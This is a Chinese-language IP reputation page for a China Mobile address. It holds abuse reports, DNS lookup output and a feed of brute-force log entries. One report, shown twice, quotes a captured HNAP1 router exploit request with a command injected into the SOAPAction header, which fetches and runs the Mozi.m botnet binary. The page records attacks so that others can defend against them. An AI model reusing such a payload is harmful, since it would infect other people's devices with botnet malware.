111.42.67.72 - IPInfo

基本信息:

城市(city): unknown

省份(region): unknown

国家(country): China

运营商(isp): China Mobile Communications Corporation

主机名(hostname): unknown

机构(organization): unknown

使用类型(Usage Type): unknown

用户上报:

点此参与IP信息讨论

类型	评论内容	时间
attackbotsspam	suspicious action Thu, 27 Feb 2020 11:22:32 -0300	2020-02-28 03:23:14

相同子网IP讨论:

IP	类型	评论内容	时间
111.42.67.31	attackspam	Unauthorized connection attempt detected from IP address 111.42.67.31 to port 2323 [T]	2020-04-14 23:25:30
111.42.67.77	attackspam	POST /HNAP1/ HTTP/1.0 Content-Type: text/xml; charset="utf-8" SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://111.42.67.77:38257/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m` Content-Length: 640 2020-04-06 12:23:14
111.42.67.49	attackbotsspam	Fail2Ban Ban Triggered	2020-03-28 16:26:23

类型

评论内容

时间

111.42.67.31

attackspam

Unauthorized connection attempt detected from IP address 111.42.67.31 to port 2323 [T]

2020-04-14 23:25:30

111.42.67.77

attackspam

POST /HNAP1/ HTTP/1.0
Content-Type: text/xml; charset="utf-8"
SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://111.42.67.77:38257/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`
Content-Length: 640
2020-04-06 12:23:14

111.42.67.49

attackbotsspam

Fail2Ban Ban Triggered

2020-03-28 16:26:23

WHOIS信息:

DIG信息:

; <<>> DiG 9.10.3-P4-Ubuntu <<>> 111.42.67.72
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 40516
;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4096
;; QUESTION SECTION:
;111.42.67.72.			IN	A

;; AUTHORITY SECTION:
.			538	IN	SOA	a.root-servers.net. nstld.verisign-grs.com. 2020022701 1800 900 604800 86400

;; Query time: 124 msec
;; SERVER: 183.60.83.19#53(183.60.83.19)
;; WHEN: Fri Feb 28 03:23:09 CST 2020
;; MSG SIZE  rcvd: 116

HOST信息:

72.67.42.111.in-addr.arpa has no PTR record

NSLOOKUP信息:

;; Got SERVFAIL reply from 183.60.83.19, trying next server
Server:		183.60.82.98
Address:	183.60.82.98#53

** server can't find 72.67.42.111.in-addr.arpa: SERVFAIL

最新评论:

IP	类型	评论内容	时间
38.89.141.90	attackspam	lfd: (smtpauth) Failed SMTP AUTH login from 38.89.141.90 (-): 5 in the last 3600 secs - Sat Sep 8 01:50:11 2018	2020-09-25 21:27:36
52.143.71.231	attackbotsspam	Sep 25 07:53:01 prox sshd[29623]: Failed password for root from 52.143.71.231 port 19464 ssh2	2020-09-25 22:01:51
180.117.97.161	attackspambots	lfd: (smtpauth) Failed SMTP AUTH login from 180.117.97.161 (-): 5 in the last 3600 secs - Thu Sep 6 11:31:10 2018	2020-09-25 21:43:09
13.90.203.143	attack	Sep 25 15:50:55 [host] sshd[6599]: Invalid user 17 Sep 25 15:50:55 [host] sshd[6599]: pam_unix(sshd:a Sep 25 15:50:57 [host] sshd[6599]: Failed password	2020-09-25 21:58:43
189.46.244.240	attack	Honeypot attack, port: 81, PTR: 189-46-244-240.dsl.telesp.net.br.	2020-09-25 22:06:16
139.186.69.226	attack	invalid user	2020-09-25 22:06:48
114.33.143.30	attackspambots	Telnet/23 MH Probe, Scan, BF, Hack -	2020-09-25 21:29:04
67.205.162.223	attack	Sep 25 14:40:14 melroy-server sshd[14062]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=67.205.162.223 Sep 25 14:40:15 melroy-server sshd[14062]: Failed password for invalid user test from 67.205.162.223 port 57144 ssh2 ...	2020-09-25 22:04:10
111.229.19.221	attack	(sshd) Failed SSH login from 111.229.19.221 (CN/China/-): 5 in the last 3600 secs; Ports: *; Direction: inout; Trigger: LF_SSHD; Logs: Sep 24 21:33:45 optimus sshd[27533]: Invalid user sandy from 111.229.19.221 Sep 24 21:33:45 optimus sshd[27533]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=111.229.19.221 Sep 24 21:33:47 optimus sshd[27533]: Failed password for invalid user sandy from 111.229.19.221 port 34918 ssh2 Sep 24 21:45:29 optimus sshd[31152]: Did not receive identification string from 111.229.19.221 Sep 24 21:50:25 optimus sshd[32722]: Invalid user ftpuser from 111.229.19.221	2020-09-25 22:07:21
62.112.11.81	attackbotsspam	Cowrie Honeypot: 10 unauthorised SSH/Telnet login attempts between 2020-09-25T09:12:07Z and 2020-09-25T09:58:25Z	2020-09-25 21:54:17
36.65.83.42	attack	Brute force blocker - service: proftpd1, proftpd2 - aantal: 43 - Thu Sep 6 11:10:17 2018	2020-09-25 21:32:15
116.75.110.248	attackspambots	Listed on dnsbl-sorbs plus abuseat.org and zen-spamhaus / proto=6 . srcport=43091 . dstport=23 . (3637)	2020-09-25 21:43:43
188.234.247.110	attackbots	Invalid user zzz from 188.234.247.110 port 46764	2020-09-25 21:53:13
117.85.52.231	attack	lfd: (smtpauth) Failed SMTP AUTH login from 117.85.52.231 (CN/China/231.52.85.117.broad.wx.js.dynamic.163data.com.cn): 5 in the last 3600 secs - Fri Sep 7 22:14:51 2018	2020-09-25 21:26:10
40.112.49.16	attackspambots	Sep 25 12:39:15 ns3033917 sshd[12992]: Invalid user admin from 40.112.49.16 port 3811 Sep 25 12:39:16 ns3033917 sshd[12992]: Failed password for invalid user admin from 40.112.49.16 port 3811 ssh2 Sep 25 13:36:23 ns3033917 sshd[13564]: Invalid user 18.157.159.173 from 40.112.49.16 port 29798 ...	2020-09-25 21:48:06

最近上报的IP列表

71.209.63.32	56.122.71.65	16.143.246.189	80.154.200.71
77.224.213.120	116.14.46.109	185.38.250.84	131.221.213.21
159.203.7.205	84.38.181.187	125.134.195.104	124.166.171.98
123.21.210.73	109.106.137.26	92.116.160.65	42.115.19.112
124.161.101.63	190.200.128.224	178.22.145.164	124.120.33.83